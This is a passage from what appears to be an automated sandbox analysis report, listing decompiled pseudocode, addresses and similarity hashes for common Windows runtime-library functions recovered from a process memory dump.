				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x16d5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x16d7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E016297C0();
				}
				if( *0x16d79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x16d79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01611624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01607D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0167FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01629520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0161E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0163DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x16d6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x16d6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01629980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E016295D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01607D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01607D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01667016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0167FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x16d5350;
							if(_t109 != 0x16d5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0167FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01675720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                0x015e2d8a
                                                0x015e2d8a
                                                0x015e2d92
                                                0x015e2d96
                                                0x015e2d9e
                                                0x015e2da0
                                                0x015e2da3
                                                0x015e2da5
                                                0x015e2da8
                                                0x015e2dab
                                                0x015e2db2
                                                0x0163f9aa
                                                0x0163f9ab
                                                0x0163f9ae
                                                0x0163f9ae
                                                0x015e2db8
                                                0x015e2dc2
                                                0x0163f9b9
                                                0x0163f9be
                                                0x0163f9bf
                                                0x0163f9bf
                                                0x015e2dcf
                                                0x0163f9c9
                                                0x015e2dd5
                                                0x015e2dd5
                                                0x015e2dd5
                                                0x015e2dde
                                                0x015e2de1
                                                0x015e2e70
                                                0x015e2e72
                                                0x015e2e72
                                                0x015e2de7
                                                0x015e2deb
                                                0x015e2e7c
                                                0x015e2e83
                                                0x015e2e85
                                                0x015e2e8b
                                                0x015e2e8d
                                                0x015e2e92
                                                0x015e2e92
                                                0x015e2e85
                                                0x015e2df1
                                                0x015e2df7
                                                0x015e2df9
                                                0x015e2df9
                                                0x015e2dfc
                                                0x015e2dff
                                                0x015e2e02
                                                0x00000000
                                                0x015e2e05
                                                0x015e2e0c
                                                0x0163f9d9
                                                0x015e2e12
                                                0x015e2e12
                                                0x015e2e12
                                                0x015e2e1a
                                                0x0163f9e3
                                                0x0163f9e9
                                                0x0163f9f0
                                                0x0163f9f6
                                                0x0163f9f8
                                                0x0163f9f8
                                                0x0163f9f0
                                                0x015e2e23
                                                0x0163fa02
                                                0x0163fa03
                                                0x0163fa05
                                                0x0163fa06
                                                0x00000000
                                                0x015e2e29
                                                0x015e2e29
                                                0x015e2e2e
                                                0x015e2e34
                                                0x015e2e3e
                                                0x00000000
                                                0x00000000
                                                0x015e2e44
                                                0x015e2e47
                                                0x015e2e4d
                                                0x00000000
                                                0x00000000
                                                0x015e2e4f
                                                0x015e2e54
                                                0x00000000
                                                0x00000000
                                                0x015e2e5a
                                                0x015e2e5f
                                                0x015e2e9a
                                                0x015e2ea4
                                                0x015e2ea5
                                                0x015e2ea8
                                                0x015e2eaf
                                                0x015e2eb2
                                                0x015e2eb5
                                                0x0163fae9
                                                0x0163faeb
                                                0x0163faed
                                                0x0163faef
                                                0x0163faf7
                                                0x0163faf8
                                                0x0163fafd
                                                0x0163faff
                                                0x0163fb04
                                                0x0163fb04
                                                0x0163faff
                                                0x015e2ec0
                                                0x015e2ec4
                                                0x015e2ec6
                                                0x015e2ec8
                                                0x0163fb14
                                                0x0163fb18
                                                0x0163fb1e
                                                0x0163fb21
                                                0x0163fb21
                                                0x015e2ece
                                                0x015e2ece
                                                0x015e2ece
                                                0x015e2ed7
                                                0x015e2e61
                                                0x015e2e63
                                                0x0163fa6b
                                                0x0163fa71
                                                0x0163fa76
                                                0x0163fa78
                                                0x0163fa8a
                                                0x0163fa7a
                                                0x0163fa83
                                                0x0163fa83
                                                0x0163fa8f
                                                0x0163fa91
                                                0x0163fa97
                                                0x0163fa9d
                                                0x0163faa4
                                                0x0163faaa
                                                0x0163faaf
                                                0x0163fab1
                                                0x0163fac3
                                                0x0163fab3
                                                0x0163fabc
                                                0x0163fabc
                                                0x0163fac8
                                                0x0163facb
                                                0x0163fadf
                                                0x0163fadf
                                                0x0163facb
                                                0x0163faa4
                                                0x0163fa91
                                                0x015e2e6f
                                                0x015e2e6f
                                                0x015e2e5f
                                                0x0163fa13
                                                0x0163fa15
                                                0x0163fa17
                                                0x0163fa1f
                                                0x0163fa21
                                                0x0163fa22
                                                0x0163fa25
                                                0x0163fa28
                                                0x0163fa2f
                                                0x0163fa2f
                                                0x0163fa2a
                                                0x0163fa2a
                                                0x0163fa2a
                                                0x0163fa31
                                                0x0163fa34
                                                0x0163fa36
                                                0x0163fa3c
                                                0x0163fa3e
                                                0x0163fa41
                                                0x0163fa43
                                                0x0163fa45
                                                0x0163fa45
                                                0x0163fa41
                                                0x0163fa3c
                                                0x0163fa4a
                                                0x0163fa4f
                                                0x0163fa51
                                                0x0163fa53
                                                0x0163fa56
                                                0x0163fa5b
                                                0x0163fa5e
                                                0x00000000
                                                0x0163fa5e
                                                0x015e2e23

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Re-Waiting
                                                • API String ID: 0-316354757
                                                • Opcode ID: f351eed3f90181efed95e0742da348f22203a9c9a2ec76e650792b44d4f0a425
                                                • Instruction ID: 83991a299a6e9fd45020d498acd0a919a80d6423b66a3157e06c1359ba56d139
                                                • Opcode Fuzzy Hash: f351eed3f90181efed95e0742da348f22203a9c9a2ec76e650792b44d4f0a425
                                                • Instruction Fuzzy Hash: D3610031E00615EFEB26DB6CCC44B7E7BE9FB84714F1406A9E9119B3C5C77499028792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016B0EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 80%
                                                			E016B0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E016AFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E016B1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01629730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E016AA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E016AA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x16d8b04 >> 0x14) + (_v44 -  *0x16d8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01607D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E016A138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01607D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0169FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x16d8724 & 0x00000008) != 0) {
						E016A52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E016B15B5(0x16d8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                0x016b0eb7
                                                0x016b0eb9
                                                0x016b0ec0
                                                0x016b0ec2
                                                0x016b0ecd
                                                0x016b105b
                                                0x016b105b
                                                0x016b1061
                                                0x016b1066
                                                0x016b1066
                                                0x016b106b
                                                0x016b1073
                                                0x016b1073
                                                0x016b0ed3
                                                0x016b0ed6
                                                0x016b0edc
                                                0x016b0ee0
                                                0x016b0ee7
                                                0x016b0ef0
                                                0x016b0ef5
                                                0x016b0efa
                                                0x016b0efc
                                                0x016b0efd
                                                0x016b0f03
                                                0x016b0f04
                                                0x016b0f06
                                                0x016b0f07
                                                0x016b0f09
                                                0x016b0f0e
                                                0x016b0f14
                                                0x016b0f23
                                                0x016b0f2d
                                                0x016b0f34
                                                0x016b0f34
                                                0x016b0f14
                                                0x016b0f52
                                                0x00000000
                                                0x00000000
                                                0x016b0f58
                                                0x016b0f73
                                                0x016b0f74
                                                0x016b0f79
                                                0x016b0f7d
                                                0x016b0f80
                                                0x016b0f86
                                                0x016b0fab
                                                0x016b0fb5
                                                0x016b0fc6
                                                0x016b0fd1
                                                0x016b0fe3
                                                0x016b0fd3
                                                0x016b0fdc
                                                0x016b0fdc
                                                0x016b0feb
                                                0x016b1009
                                                0x016b1009
                                                0x016b1015
                                                0x016b1027
                                                0x016b1017
                                                0x016b1020
                                                0x016b1020
                                                0x016b102f
                                                0x016b103c
                                                0x016b103c
                                                0x016b1048
                                                0x016b1050
                                                0x016b1050
                                                0x016b1055
                                                0x00000000
                                                0x016b1055
                                                0x016b0f88
                                                0x016b0f9e
                                                0x016b0fa2
                                                0x016b0fa9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x016b0fa9
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: `
                                                • API String ID: 0-2679148245
                                                • Opcode ID: 8f4861b8235d977ab53e33b9fe60d8abed38eed931a2995860d735c7e84a18e0
                                                • Instruction ID: aba5ef75ee6f0a4781a7352fe72c089b40463a16ea87a62f6fa2de51cfef00ba
                                                • Opcode Fuzzy Hash: 8f4861b8235d977ab53e33b9fe60d8abed38eed931a2995860d735c7e84a18e0
                                                • Instruction Fuzzy Hash: EF518D713043429BD325DF28DCD4B5BBBEAEB85704F04092DFA9697290DB70E885CB66
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0161F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 75%
                                                			E0161F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01604120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01629830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01629990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E016295D0();
							goto L11;
						} else {
							_t109 = L01604620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0162F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E016295D0();
										L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                0x0161f0d3
                                                0x0161f0d9
                                                0x0161f0e0
                                                0x0161f0e7
                                                0x0161f0f2
                                                0x0161f0f4
                                                0x0161f0f8
                                                0x0161f100
                                                0x0161f108
                                                0x0161f10d
                                                0x0161f115
                                                0x0161f116
                                                0x0161f11f
                                                0x0161f123
                                                0x0161f124
                                                0x0161f12c
                                                0x0161f130
                                                0x0161f134
                                                0x0161f13d
                                                0x0161f144
                                                0x0161f14b
                                                0x0161f152
                                                0x0165bab0
                                                0x0165bab0
                                                0x0161f158
                                                0x0161f158
                                                0x0161f15a
                                                0x0161f160
                                                0x0161f165
                                                0x0161f166
                                                0x0161f16f
                                                0x0161f173
                                                0x0165baa7
                                                0x0165baa7
                                                0x0165baab
                                                0x00000000
                                                0x0161f179
                                                0x0161f18d
                                                0x0161f191
                                                0x0165baa2
                                                0x00000000
                                                0x0161f197
                                                0x0161f19b
                                                0x0161f1a2
                                                0x0161f1a9
                                                0x0161f1af
                                                0x0161f1b2
                                                0x0161f1b6
                                                0x0161f1b9
                                                0x0161f1c4
                                                0x0161f1d8
                                                0x0161f1df
                                                0x0161f1e3
                                                0x0161f1eb
                                                0x0161f1ee
                                                0x0161f1f4
                                                0x0161f20f
                                                0x0165bab7
                                                0x0165babb
                                                0x0165bacc
                                                0x0165bad1
                                                0x0161f215
                                                0x0161f218
                                                0x0161f226
                                                0x0161f22b
                                                0x00000000
                                                0x0161f22b
                                                0x0161f1f6
                                                0x0161f1f6
                                                0x0161f1f9
                                                0x0161f1fb
                                                0x0161f1fb
                                                0x0161f1f4
                                                0x0161f191
                                                0x0161f173
                                                0x0161f152
                                                0x0161f203

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                • Instruction ID: 00af10e16db3254c8fdf0200f1a40b8ca518a84217475d81efeb9abe12d93306
                                                • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                • Instruction Fuzzy Hash: D8515A71604711AFC321DF29C841A6BBBF9FF88710F00892EFA9597690E7B4E914CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01663540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 75%
                                                			E01663540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x16dd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01620BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01663706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0162FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01663540;
						E0162FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0163DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01670C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E016297C0();
					}
					return E0162B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01663971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01663884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0162FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E01629650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01663787(_a4,  &_v352, _t80);
						}
					}
					L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E016295D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                0x01663552
                                                0x0166355a
                                                0x0166355d
                                                0x01663566
                                                0x01663567
                                                0x0166357e
                                                0x0166358f
                                                0x016635a1
                                                0x016635a5
                                                0x0166366b
                                                0x0166366b
                                                0x0166366d
                                                0x01663672
                                                0x01663679
                                                0x01663685
                                                0x0166368d
                                                0x0166369d
                                                0x016636a7
                                                0x016636b8
                                                0x016636c6
                                                0x016636c7
                                                0x016636dc
                                                0x016636e1
                                                0x016636e7
                                                0x016636e9
                                                0x016636e9
                                                0x01663703
                                                0x01663703
                                                0x016635b5
                                                0x016635c0
                                                0x016635c4
                                                0x00000000
                                                0x00000000
                                                0x016635ca
                                                0x016635d7
                                                0x016635e2
                                                0x016635e6
                                                0x016635e8
                                                0x016635f5
                                                0x016635fa
                                                0x01663603
                                                0x01663604
                                                0x01663609
                                                0x0166360a
                                                0x01663612
                                                0x01663613
                                                0x0166361e
                                                0x01663622
                                                0x01663628
                                                0x0166362f
                                                0x0166362f
                                                0x01663636
                                                0x01663638
                                                0x0166363b
                                                0x01663642
                                                0x01663642
                                                0x01663636
                                                0x01663657
                                                0x01663657
                                                0x0166365c
                                                0x01663662
                                                0x01663669
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryHash
                                                • API String ID: 0-2202222882
                                                • Opcode ID: 54b6e00a43681577fec477bc53e638477bc3c3188019cdfc852c69a7e20dfa05
                                                • Instruction ID: c4550c3fdd16116733a57c36dc6f012955e79190fe5e08b8f210144a70aa1cea
                                                • Opcode Fuzzy Hash: 54b6e00a43681577fec477bc53e638477bc3c3188019cdfc852c69a7e20dfa05
                                                • Instruction Fuzzy Hash: 794145B1D0053DABDB21DA50CC81FEEB77DAB54714F0045E9EA09AB241DB309E88CF98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016B05AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 71%
                                                			E016B05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E016B07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E01629730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E016AA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E016AA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E016B1293(_t79, _v40, E016B07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E01607D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E016A138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                0x016b05c5
                                                0x016b05ca
                                                0x016b05d3
                                                0x016b06db
                                                0x016b06db
                                                0x016b06dd
                                                0x016b06e3
                                                0x016b06e3
                                                0x016b05dd
                                                0x016b05e7
                                                0x016b05f6
                                                0x016b0600
                                                0x016b0607
                                                0x016b0610
                                                0x016b0615
                                                0x016b061a
                                                0x016b061c
                                                0x016b061e
                                                0x016b0624
                                                0x016b0625
                                                0x016b0627
                                                0x016b0628
                                                0x016b0631
                                                0x016b0640
                                                0x016b064d
                                                0x016b0654
                                                0x016b0654
                                                0x016b0631
                                                0x016b066d
                                                0x016b0674
                                                0x00000000
                                                0x00000000
                                                0x016b0692
                                                0x016b069e
                                                0x016b06b0
                                                0x016b06a0
                                                0x016b06a9
                                                0x016b06a9
                                                0x016b06b8
                                                0x016b06d6
                                                0x016b06d6
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: `
                                                • API String ID: 0-2679148245
                                                • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                • Instruction ID: 0945a73618284e7c4c17292d454dcdf0e0cf2219906001f9bd6ef10ff58b80a0
                                                • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                • Instruction Fuzzy Hash: E731F1326003166BE720DE28CC85FDB7FEAEBC4754F144229FA589B280E770E944CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01663884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 72%
                                                			E01663884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
